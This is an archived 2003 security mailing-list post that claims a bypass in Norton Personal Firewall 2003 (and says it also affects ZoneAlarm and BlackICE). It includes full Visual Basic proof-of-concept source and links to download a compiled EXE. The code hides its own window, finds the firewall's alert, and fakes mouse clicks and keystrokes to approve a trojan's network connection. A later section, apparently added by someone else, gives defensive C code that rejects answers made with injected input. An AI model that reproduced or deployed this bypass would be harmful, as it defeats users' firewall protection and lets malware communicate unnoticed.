
Bug in Norton FireWall 2003

From: Boy Bear <eyal067(at)walla.co.il>
Date: Sat Aug 09 2003 - 04:12:03 EDT

The Bug factor so lamb Firewall "ignored" from Trojan.

The Trojan than himself in Firewall and so the actually Trojan worker without disturbance the of Firewall.

I added a model in VB and EXE

NortonEXE - http://iso.bbs.us:777/binaryvision/Norton/NortonEXE.zip
NortonSRC - http://iso.bbs.us:777/binaryvision/Norton/NortonSRC.zip

This is the code:

Dim numNoWindows As Integer
Dim CMD1 As Integer

Const MOUSEEVENTF_MOVE = &H1
Const MOUSEEVENTF_LEFTDOWN = &H2
Const MOUSEEVENTF_LEFTUP = &H4
Const MOUSEEVENTF_RIGHTDOWN = &H8
Const MOUSEEVENTF_RIGHTUP = &H10
Const MOUSEEVENTF_MIDDLEDOWN = &H20
Const MOUSEEVENTF_MIDDLEUP = &H40
Const MOUSEEVENTF_WHEEL = &H800
Const MOUSEEVENTF_ABSOLUTE = &H8000

Private Type POINTAPI
X As Long
Y As Long
End Type

Private Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long
Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Long, ByVal dX As Long, _
ByVal dY As Long, ByVal cButtons As Long, ByVal dwExtraInfo As Long)

Private Points() As POINTAPI
Private iCount As Long
Private Const KLF_REORDER = &H8
Private Const lang_English = 67699721
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, _
ByVal X As Long, ByVal Y As Long, ByVal CX As Long, ByVal CY As Long, ByVal wFlags As Long) As Long
Private Const SW_HIDE = 0 ' sent to ShowWindow function
Private Const SW_SHOW = 5 ' sent to ShowWindow function
Private Const HWND_TOPMOST = -1 'sent to SetWindowPos function
Private Const vbClass = "wndclass_desked_gsk" 'Visual Basic Class name
Private Declare Function ActivateKeyboardLayout Lib "user32" (ByVal HKL As Long, ByVal flags As Long) As Long

Private Sub Command1_Click()
If Winsock2.State <> sckClosed Then Winsock2.Close
Winsock2.Connect
End Sub

Private Sub Command2_Click()
Winsock1.Listen
End Sub

Private Sub Form_Load()
Dim lForm As Long
lForm = Me.hwnd
SetWindowPos lForm, HWND_TOPMOST, 0, 0, 0, 0, 1
X = Command
If X = "" Then
Shell (App.Path & "\" & App.EXEName & ".exe /Connect")
Winsock2.Connect
X = ""
ElseIf X = "/Connect" Then
X = ""
Me.Hide
Timer2.Enabled = True
End If
End Sub
Private Sub Timer2_Timer()
Dim hwnd As Long
hwnd = FindWindow(vbNullString, "Norton Personal Firewall")
If hwnd = 0 Then
numNoWindows = numNoWindows + 1
If numNoWindows = 150 Then
Timer2.Enabled = False
End
End If
Else
Call ActivateKeyboardLayout(lang_English, KLF_REORDER)
X = Screen.Width * 2.7
Y = Screen.Height * 2.7
mouse_event MOUSEEVENTF_ABSOLUTE + MOUSEEVENTF_MOVE + MOUSEEVENTF_LEFTDOWN + MOUSEEVENTF_LEFTUP, Y, X, 0, 0
CMD1 = CMD1 + 1
If CMD1 = 1 Then
Timer2.Interval = 300
ElseIf CMD1 = 2 Then
SendKeys "{tab}"
ElseIf CMD1 = 3 Then
SendKeys " "
ElseIf CMD1 = 4 Then

SendKeys "{UP}"
SendKeys "{UP}"
SendKeys "{UP}"

ElseIf CMD1 = 5 Then
SendKeys "{ENTER}"
Timer2.Enabled = False
End
End If
End If
End Sub
Private Sub Winsock2_Connect()

Winsock2.SendData "Msg-Box"

End Sub
Private Sub wHideShow(HideShow As Boolean)

Dim hwnd As Long
hwnd = FindWindow(vbNullString, "Norton Personal Firewall")
'if not found then..

If hwnd = 0 Then
Exit Sub
End If
'if not hidden - hide, else - show

If HideShow Then
ShowWindow hwnd, SW_SHOW
Else
ShowWindow hwnd, SW_SHOW
End If

End Sub

The bug can act on any firewalls that I recognize (ZoneAlarm, BlackICE...)

The full article is located here (in Hebrew):

http://tankz.zext.net/binaryvision/index.php?title=bug%20in%20Norton%20Firewall%202003&page=modules/articles/display.php&cat=Security&file=bug%20in%20Norton%20Firewall%202003&right=modules/articles

BoyBear From BinaryVision ( http://binaryvision.tech.nu )

Received on Mon Aug 11 13:31:37 2003
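
A defensive counterpart to the scripted click and key sequence in the post above, added here as an example that is not part of the original message or any vendor's code: the decision a firewall alert could make using the injected-input flags that Windows low-level hooks report for input generated by calls such as mouse_event. The input_event record, the accept_alert_answer function, the minimum-delay policy and the sample events are assumptions made for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Flag values from winuser.h, copied so the logic builds on any platform. */
#define LLKHF_INJECTED 0x00000010u /* KBDLLHOOKSTRUCT.flags */
#define LLMHF_INJECTED 0x00000001u /* MSLLHOOKSTRUCT.flags */

typedef enum { EV_KEY, EV_MOUSE } ev_kind;

/* Hypothetical record of one event seen by a low-level hook during the alert. */
typedef struct {
    ev_kind kind;
    uint32_t flags; /* flags field of the hook structure */
    uint32_t t_ms;  /* milliseconds since the alert was shown */
} input_event;

/* True when the event was synthesized by software rather than a device. */
bool is_injected(const input_event *e) {
    uint32_t bit = (e->kind == EV_KEY) ? LLKHF_INJECTED : LLMHF_INJECTED;
    return (e->flags & bit) != 0;
}

/* Returns 1 if an "allow" answer may be honoured, 0 to keep blocking.
   Assumed policy: any injected event, or any event earlier than
   min_delay_ms after the alert appeared, invalidates the answer. */
int accept_alert_answer(const input_event *ev, size_t n, uint32_t min_delay_ms) {
    if (ev == NULL || n == 0) return 0;
    for (size_t i = 0; i < n; i++) {
        if (is_injected(&ev[i]) || ev[i].t_ms < min_delay_ms) return 0;
    }
    return 1;
}

/* Constructed samples: a scripted click-and-keys answer, and a manual one. */
const input_event scripted[] = {
    { EV_MOUSE, LLMHF_INJECTED, 300 }, { EV_KEY, LLKHF_INJECTED, 600 },
    { EV_KEY, LLKHF_INJECTED, 900 },   { EV_KEY, LLKHF_INJECTED, 1200 },
};
const input_event manual[] = {
    { EV_MOUSE, 0, 1800 }, { EV_KEY, 0x01u /* extended key, not injected */, 2400 },
};

int main(void) {
    printf("scripted accepted: %d\n", accept_alert_answer(scripted, 4, 500));
    printf("manual accepted:   %d\n", accept_alert_answer(manual, 2, 500));
    return 0;
}
```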

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:40 EDT

